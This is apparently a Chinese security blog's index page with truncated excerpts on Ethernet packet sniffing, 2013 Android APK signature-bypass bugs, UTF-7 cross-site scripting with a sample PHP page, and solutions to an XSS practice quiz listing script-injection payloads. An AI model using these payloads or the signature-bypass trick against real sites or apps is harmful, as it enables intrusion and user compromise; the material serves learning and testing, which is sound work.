• 以太网(Ethernet)具有共享介质的特征,信息是以明文的形式在网络上传输,当网络适配器设置为监听模式(混杂模式,Promiscuous)时, 由于采用以太网广播信道争用的方式,使得监听系统与正常通信的网络能够并联连接,并可以捕获任何一个在同一冲突域上传输的数据包...
  • 简单提下上个月爆的两个绕过android签名检验的漏洞:

     

    http://bbs.pediy.com/showthread.php?t=175129

    第一个android签名漏洞,在BlackHat USA 2013上漏洞发现者也讲了,原理就是解压apk(zip压缩包)时,若同时存在两个classes.dex,第二个dex会覆盖第...
  • 2013-12-20

    UTF-7 XSS 浅析 - [XSS]

    Author:laterain

    From:90sec

    Test on: IE 8.0

    vul.php

    <?php
    header('Content-Type: text/html');
    $string = $_GET["note"];
    echo htmlentities($string);//用htmlentities函数过滤?>
    sec.php

    <?php
    header('Content-Type: text/html;charse...
  • 大概是由heige牵头,导致UTF-7 XSS最近满火的,好多大侠也都在博客里撰文探讨

    最喜欢奇技淫巧了,写点东西出来

    不对的地方请指正

    UTF-7是什么

    UTF-7 (7-位元 Unicode 转换格式(Unicode Transformation Format,简写成 UTF)) 是一种可变长度字元编码方式,...
  • http://xss-quiz.int21h.jp
    第一关:<img onerror="alert(document.domain);" src=>
    第二关:"><script>alert(document.domain);</script>

    第三关:
    http://xss-quiz.int21h.jp/stage-3.php?sid=93de7707279b3a5ae4ce419bfc7c0b1f380a20f...